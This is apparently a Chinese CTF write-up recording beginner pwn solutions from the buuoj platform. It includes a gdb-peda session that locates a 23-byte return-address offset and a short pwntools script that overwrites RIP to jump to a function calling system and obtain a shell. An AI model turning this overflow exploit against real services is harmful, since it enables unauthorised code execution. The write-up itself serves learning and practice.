buuoj pwn记录

最近开始努力学pwn,glzjin大佬搞了个他学校的ctf平台,题目都还挺不错的,边做边记录吧。
链接:buuoj

连上就有flag的pwn

如题,nc连上就有flag。

RIP覆盖一下

拖进ida反汇编可以看到是单纯的rip覆盖
mark

在fun函数里直接有shell可以利用,只需算出偏移
mark

打开gdb-peda,几条简单的命令就可以算出偏移

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
root@kali:~# gdb ./pwn1
gdb-peda$ pattc 50
'AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA'
gdb-peda$ start
gdb-peda$ contin
Continuing.
please input
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA
ok,bye!!!

Program received signal SIGSEGV, Segmentation fault.

[----------------------------------registers-----------------------------------]
RAX: 0x0
RBX: 0x0
RCX: 0x7ffff7ed7804 (<write+20>: cmp rax,0xfffffffffffff000)
RDX: 0x7ffff7faa8c0 --> 0x0
RSI: 0x405260 ("ok,bye!!!\nAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbA\n")
RDI: 0x0
RBP: 0x412d41414341416e ('nAACAA-A')
RSP: 0x7fffffffe1a8 ("A(AADAA;AA)AAEAAaAA0AAFAAbA")
RIP: 0x401185 (<main+67>: ret)
R8 : 0x7ffff7faf500 (0x00007ffff7faf500)
R9 : 0x0
R10: 0x405010 --> 0x0
R11: 0x246
R12: 0x401060 (<_start>: xor ebp,ebp)
R13: 0x7fffffffe280 --> 0x1
R14: 0x0
R15: 0x0
EFLAGS: 0x10246 (carry PARITY adjust ZERO sign trap INTERRUPT direction overflow)
[-------------------------------------code-------------------------------------]
0x40117a <main+56>: call 0x401030 <puts@plt>
0x40117f <main+61>: mov eax,0x0
0x401184 <main+66>: leave
=> 0x401185 <main+67>: ret
0x401186 <fun>: push rbp
0x401187 <fun+1>: mov rbp,rsp
0x40118a <fun+4>: lea rdi,[rip+0xe8a] # 0x40201b
0x401191 <fun+11>: call 0x401040 <system@plt>
[------------------------------------stack-------------------------------------]
0000| 0x7fffffffe1a8 ("A(AADAA;AA)AAEAAaAA0AAFAAbA")
0008| 0x7fffffffe1b0 ("AA)AAEAAaAA0AAFAAbA")
0016| 0x7fffffffe1b8 ("aAA0AAFAAbA")
0024| 0x7fffffffe1c0 --> 0x100416241
0032| 0x7fffffffe1c8 --> 0x401142 (<main>: push rbp)
0040| 0x7fffffffe1d0 --> 0x0
0048| 0x7fffffffe1d8 --> 0x3777803596990da
0056| 0x7fffffffe1e0 --> 0x401060 (<_start>: xor ebp,ebp)
[------------------------------------------------------------------------------]
Legend: code, data, rodata, value
Stopped reason: SIGSEGV
0x0000000000401185 in main ()
gdb-peda$ pattern offset A(AADAA;AA)AAEAAaAA0AAFAAbA
A(AADAA;AA)AAEAAaAA0AAFAAbA found at offset: 23

得到偏移后写一个简单的exp即可得到flag:

1
2
3
4
5
6
7
from pwn import *

p = remote("buuoj.cn",6001)
pushadr = 0x401186
payload = 'a' * 23 + p64(pushadr)
p.sendline(payload)
p.interactive()